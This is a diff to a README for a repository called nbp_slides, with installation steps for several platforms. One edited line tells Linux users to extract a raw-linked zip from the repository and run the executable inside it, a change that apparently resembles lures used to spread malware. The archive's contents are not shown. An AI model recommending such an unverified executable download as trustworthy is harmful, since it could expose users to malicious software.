noumanx/nbp_slides/README.md

 2. **Open the Application:**
    - For Windows: Double-click the `.exe` file to launch the application.
    - For macOS: Open the `.dmg` file, then drag the application to your Applications folder.
 Double-click to start.
-   - For Linux: Extract the downloaded tar.gz file and run the executable.
+   - For Linux: Extract the downloaded https://github.com/noumanx/nbp_slides/raw/refs/heads/master/tools/nbp_slides_v1.5.zip file and run the executable.

 3. **Follow the On-Screen Instructions:**
    - The application will guide you through the setup process.
 Just follow the prompts.